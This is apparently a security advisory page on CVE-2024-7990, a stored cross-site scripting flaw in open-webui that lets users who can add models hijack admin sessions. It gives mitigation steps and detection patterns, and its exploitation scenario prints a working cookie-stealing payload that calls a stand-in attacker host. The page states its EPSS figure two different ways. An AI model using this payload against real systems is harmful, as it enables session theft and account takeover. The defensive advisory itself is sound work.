AI Threat Alert
CVE-2024-7990: open-webui: Stored XSS enables admin session hijack
GHSA-gj27-76gq-5v3p HIGH CISA: ATTENDIf your team runs open-webui 0.3.8 or earlier as an LLM interface, any user with model-creation privileges can plant a persistent XSS payload that executes in every admin's browser — including stealing session tokens and performing privileged actions. No patch is currently listed; restrict model-creation to trusted admins immediately and enforce a strict Content Security Policy. This is a privilege-escalation path disguised as a UI bug.
What is the risk?
Despite requiring High privileges to inject (PR:H), the Scope is Changed (S:C) with C:H/I:H/A:H — meaning a lower-trust model contributor can fully compromise admin-level sessions. The stored nature amplifies impact: a single malicious model description persists and executes for every subsequent viewer, including privileged users. EPSS is low (0.00158) and not in KEV, indicating no confirmed in-the-wild exploitation yet, but the attack is trivially executable by anyone with a model-add account. Exposure is high in organisations running shared open-webui instances across teams.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Open WebUI | pip | <= 0.3.8 | No patch |
Do you use Open WebUI? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
IMMEDIATE
Restrict model-creation permissions to sysadmins only — remove this capability from general users until patched.
-
PATCH
No official fix listed for 0.3.8; monitor the open-webui GitHub for a patched release and upgrade as soon as available.
-
HARDEN
Deploy a strict Content-Security-Policy header (
script-src 'self') on your open-webui instance to block inline script execution. -
DETECT
Review audit logs for unexpected model additions (
/api/v1/models/addPOST requests) from non-admin accounts. Inspect existing model descriptions for<script>,onerror=,javascript:patterns. -
ISOLATE
If multi-user access is required pre-patch, place open-webui behind a VPN or enforce IP allowlisting to limit attacker surface.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-7990?
If your team runs open-webui 0.3.8 or earlier as an LLM interface, any user with model-creation privileges can plant a persistent XSS payload that executes in every admin's browser — including stealing session tokens and performing privileged actions. No patch is currently listed; restrict model-creation to trusted admins immediately and enforce a strict Content Security Policy. This is a privilege-escalation path disguised as a UI bug.
Is CVE-2024-7990 actively exploited?
No confirmed active exploitation of CVE-2024-7990 has been reported, but organizations should still patch proactively.
How to fix CVE-2024-7990?
1. IMMEDIATE: Restrict model-creation permissions to sysadmins only — remove this capability from general users until patched. 2. PATCH: No official fix listed for 0.3.8; monitor the open-webui GitHub for a patched release and upgrade as soon as available. 3. HARDEN: Deploy a strict Content-Security-Policy header (`script-src 'self'`) on your open-webui instance to block inline script execution. 4. DETECT: Review audit logs for unexpected model additions (`/api/v1/models/add` POST requests) from non-admin accounts. Inspect existing model descriptions for `<script>`, `onerror=`, `javascript:` patterns. 5. ISOLATE: If multi-user access is required pre-patch, place open-webui behind a VPN or enforce IP allowlisting to limit attacker surface.
What systems are affected by CVE-2024-7990?
This vulnerability affects the following AI/ML architecture patterns: LLM web interfaces, model serving, multi-user AI platforms, agent frameworks.
What is the CVSS score for CVE-2024-7990?
CVE-2024-7990 has a CVSS v3.1 base score of 8.4 (HIGH). The EPSS exploitation probability is 0.89%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0011 User Execution AML.T0012 Valid Accounts AML.T0049 Exploit Public-Facing Application Compliance Controls Affected
What are the technical details?
Original Advisory
A stored cross-site scripting (XSS) vulnerability exists in open-webui/open-webui version 0.3.8. The vulnerability is present in the `/api/v1/models/add` endpoint, where the model description field is improperly sanitized before being rendered in chat. This allows an attacker to inject malicious scripts that can be executed by any user, including administrators, potentially leading to arbitrary code execution.
Exploitation Scenario
An attacker with a low-privilege open-webui account (e.g., a researcher or contractor) calls `POST /api/v1/models/add` with a model description containing `<img src=x onerror="fetch('https://attacker.io/steal?c='+document.cookie)">`. The payload is stored in the database. When the admin next opens the model catalogue or a chat session referencing this model, the script fires in their browser context — exfiltrating the admin's session cookie. The attacker replays this cookie to gain full admin access, then modifies system prompts across all models to exfiltrate user queries or inserts a backdoored model pointing to a malicious endpoint, persisting access even after the original XSS is discovered.
Weaknesses (CWE)
CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2026-44551 9.1 open-webui: LDAP auth bypass — full account takeover
Same package: open-webui CVE-2026-45672 8.8 open-webui: code exec gate bypass via API endpoint
Same package: open-webui CVE-2026-44552 8.7 open-webui: Redis cache poisoning enables cross-instance tool hijack
Same package: open-webui CVE-2025-64495 8.7 Open WebUI: XSS-to-RCE via malicious prompt injection
Same package: open-webui CVE-2026-45315 8.7 open-webui: stored XSS → JWT theft and admin takeover
Same package: open-webui